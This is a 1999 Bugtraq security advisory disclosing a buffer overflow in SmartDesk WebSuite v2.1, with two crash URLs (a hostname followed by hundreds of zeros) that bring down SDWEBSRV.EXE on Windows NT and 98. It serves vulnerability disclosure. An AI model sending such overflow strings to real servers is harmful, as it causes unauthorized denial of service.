From cmart@mail.staticusers.net Mon May 31 06:40:49 1999
From: cmart <cmart@mail.staticusers.net>
To: BUGTRAQ@netspace.org
Date: Tue, 25 May 1999 20:53:17 PDT
Subject: Buffer overflow in SmartDesk WebSuite v2.1

Advisory: Buffer overflow in SmartDesk WebSuite v2.1
Platforms Affected: Windows NT, Windows 98
Found by: cmart (cmart@staticusers.net)
Date: 5/23/99

Description:
-----------
WebSuite v2.1 will crash when an additional 250+ characters
is appended after the sites URL on NT Server 4 and NT
Workstation 4 boxes.

Running on top of Windows 98 it will crash with 150+ characters
appended after the sites URL.

After reinstallating on both platforms several times, the
overflow string length varied.  Approximately 1 out of 8 times
the overflow string went from 150 chars (Win98) to about
1000+ chars.  It also went from 250+ chars (NT) to about
2000+ chars.

After the server crashes on NT Workstation 4, it's unable
to find the lib file sysclass.flb.  (On our test).

Details:
-------
[Windows NT]
http://hostname/00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000

SDWEBSRV.EXE crashes.

[Windows 98]
http://hostname/00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000

SDWEBSRV.EXE crashes.

-----------------------------
cmart | cmart@staticusers.net
http://winntsec.com
-----------------------------